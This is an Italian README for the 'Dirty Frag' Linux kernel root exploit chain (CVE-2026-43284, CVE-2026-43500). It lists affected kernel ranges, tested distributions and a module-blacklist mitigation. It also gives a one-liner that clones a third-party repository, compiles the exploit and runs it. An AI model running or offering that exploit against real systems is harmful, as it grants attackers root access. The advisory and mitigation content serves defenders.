
Catena di exploit del kernel Linux (CVE-2026-43284 e CVE-2026-43500) che ottiene i privilegi di root tramite le vulnerabilità di scrittura nella page cache di xfrm-ESP e RxRPC.
Linux CVE-2026-43284 & CVE-2026-43500
Copiato da @V4bel :) Grazie :)
Questo documento descrive la classe di vulnerabilità Dirty Frag, scoperta e segnalata per la prima volta da Hyunwoo Kim (@v4bel), che può ottenere privilegi di root sulle principali distribuzioni Linux concatenando la vulnerabilità xfrm-ESP Page-Cache Write (CVE-2026-43284) e la vulnerabilità RxRPC Page-Cache Write (CVE-2026-43500).
Dirty Frag è un caso che estende la classe di bug a cui appartengono Dirty Pipe e Copy Fail. Poiché si tratta di un bug logico deterministico che non dipende da una finestra temporale, non è richiesta alcuna race condition, il kernel non va in panic quando l'exploit fallisce e il tasso di successo è molto elevato.
Per informazioni tecniche dettagliate e la timeline, vedere qui.
xfrm-ESP Page-Cache Write (CVE-2026-43284) è stato corretto nel mainline f4c50a4034e6.
RxRPC Page-Cache Write (CVE-2026-43500) è stato corretto nel mainline aa54b1d27fe0.
Exploiting : Eseguire solo in engagement autorizzati !!
Oneliner: git clone https://github.com/Minime794/DirtyFrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Passo dopo passo :
prima compilare l'exploit, poi eseguire il binario
gcc -O0 -Wall -o exp exp.c -lutil
./exp
!! Pulizia
⚠️ Importante: dopo aver eseguito questo exploit, la page cache è contaminata. Per svuotare la page cache inquinata e garantire la stabilità del sistema, eseguire:
echo 3 > /proc/sys/vm/drop_caches
oppure riavviare il sistema. Versioni interessate
CVE-2026-43284: la vulnerabilità xfrm-ESP Page-Cache Write è in scope da cac2661c53f3 (2017-01-17) fino a f4c50a4034e6 (2026-05-05).
CVE-2026-43500: la vulnerabilità RxRPC Page-Cache Write è in scope da 2dc334f1a63a (2023-06-08) fino a aa54b1d27fe0 (2026-05-10).
In altre parole, la durata effettiva delle vulnerabilità è di circa 9 anni.
Questo Dirty Frag è stato testato sulle seguenti versioni di distribuzione.
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64
...
Mitigazione
Usare il seguente comando per rimuovere i moduli in cui si verificano le vulnerabilità e svuotare la page cache.
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
Una volta che ciascuna distribuzione esegue il backport di una patch, aggiornare di conseguenza.